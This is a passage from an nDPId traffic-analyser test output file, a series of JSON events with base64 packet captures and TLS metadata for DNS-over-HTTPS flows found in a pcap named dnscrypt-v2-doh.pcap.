-04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCVwHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORcVLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/IDh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyR